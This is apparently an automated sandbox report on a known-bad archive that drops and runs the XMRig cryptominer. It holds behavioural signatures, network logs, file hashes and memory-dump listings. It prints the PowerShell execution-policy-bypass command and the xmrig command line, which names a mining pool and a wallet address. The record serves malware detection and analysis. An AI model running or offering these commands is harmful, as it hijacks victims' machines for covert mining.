Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-04 03:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:06
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4112 wrote to memory of 3824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4112 wrote to memory of 3824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4112-3-0x00007FFF43B33000-0x00007FFF43B34000-memory.dmp
memory/4112-5-0x0000019FAFEE0000-0x0000019FAFF02000-memory.dmp
memory/4112-6-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp
memory/4112-10-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp
memory/4112-9-0x0000019FC8560000-0x0000019FC85D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s3vkapan.2sm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4112-25-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp
memory/4112-48-0x0000019FAFFB0000-0x0000019FAFFC2000-memory.dmp
memory/4112-61-0x0000019FAFF70000-0x0000019FAFF7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3824-90-0x000001940E020000-0x000001940E040000-memory.dmp
memory/3824-91-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/4112-92-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp
memory/4112-93-0x00007FFF43B33000-0x00007FFF43B34000-memory.dmp
memory/3824-94-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-95-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-96-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-97-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-98-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-99-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-100-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-101-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-102-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-103-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-104-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-105-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-106-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-107-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-108-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-109-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-110-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-111-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-112-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-113-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-114-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-115-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-116-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-117-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-118-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-119-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-120-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-121-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-122-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-123-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-124-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-125-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-126-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-127-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-128-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-129-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-130-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-131-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-132-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-133-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-134-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-135-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-136-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-137-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-138-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-139-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-140-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-141-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-142-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-143-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-144-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-145-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-146-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-147-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-148-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-149-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-150-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-151-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-152-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-153-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-154-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
memory/3824-155-0x00007FF62AFF0000-0x00007FF62BC23000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:17
Platform
win11-20240508-en
Max time kernel
1719s
Max time network
1729s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/1576-0-0x00007FFCE84B3000-0x00007FFCE84B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bedtkilz.fbv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1576-9-0x0000027112A10000-0x0000027112A32000-memory.dmp
memory/1576-10-0x00007FFCE84B0000-0x00007FFCE8F72000-memory.dmp
memory/1576-11-0x00007FFCE84B0000-0x00007FFCE8F72000-memory.dmp
memory/1576-12-0x00007FFCE84B0000-0x00007FFCE8F72000-memory.dmp
memory/1576-13-0x00007FFCE84B3000-0x00007FFCE84B5000-memory.dmp
memory/1576-14-0x00007FFCE84B0000-0x00007FFCE8F72000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:41
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2636 wrote to memory of 2040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2636 wrote to memory of 2040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
memory/2636-0-0x00007FFCCC4C3000-0x00007FFCCC4C5000-memory.dmp
memory/2636-2-0x0000018378A20000-0x0000018378A42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2nn0bk4f.5en.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2636-11-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2636-12-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2636-14-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2636-16-0x0000018379610000-0x000001837961A000-memory.dmp
memory/2636-15-0x00000183799C0000-0x00000183799D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2040-47-0x000001A6039D0000-0x000001A6039F0000-memory.dmp
memory/2040-48-0x000001A6052D0000-0x000001A6052F0000-memory.dmp
memory/2040-49-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2636-51-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2636-50-0x00007FFCCC4C3000-0x00007FFCCC4C5000-memory.dmp
memory/2040-53-0x000001A6052F0000-0x000001A605310000-memory.dmp
memory/2040-54-0x000001A605310000-0x000001A605330000-memory.dmp
memory/2040-52-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2636-55-0x00007FFCCC4C0000-0x00007FFCCCF81000-memory.dmp
memory/2040-56-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-57-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-58-0x000001A6052F0000-0x000001A605310000-memory.dmp
memory/2040-59-0x000001A605310000-0x000001A605330000-memory.dmp
memory/2040-60-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-61-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-62-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-63-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-64-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-65-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-66-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-67-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-68-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-69-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-70-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-71-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-72-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-73-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-74-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-75-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-76-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-77-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-78-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-79-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-80-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-81-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-82-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-83-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-84-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-85-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-86-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-87-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-88-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-89-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-90-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-91-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-92-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-93-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-94-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-95-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-96-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-97-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-98-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-99-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-100-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-101-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-102-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-103-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-104-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-105-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-106-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-107-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-108-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-109-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-110-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-111-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-112-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-113-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-114-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-115-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-116-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-117-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
memory/2040-118-0x00007FF70E4E0000-0x00007FF70F113000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:14
Platform
win11-20240611-en
Max time kernel
1798s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4896 wrote to memory of 2008 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4896 wrote to memory of 2008 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/4896-0-0x00007FFF60233000-0x00007FFF60235000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kt10jmoh.anc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4896-9-0x0000017672F70000-0x0000017672F92000-memory.dmp
memory/4896-10-0x00007FFF60230000-0x00007FFF60CF2000-memory.dmp
memory/4896-11-0x00007FFF60230000-0x00007FFF60CF2000-memory.dmp
memory/4896-12-0x00007FFF60230000-0x00007FFF60CF2000-memory.dmp
memory/4896-14-0x0000017673110000-0x0000017673122000-memory.dmp
memory/4896-15-0x0000017673100000-0x000001767310A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:16
Platform
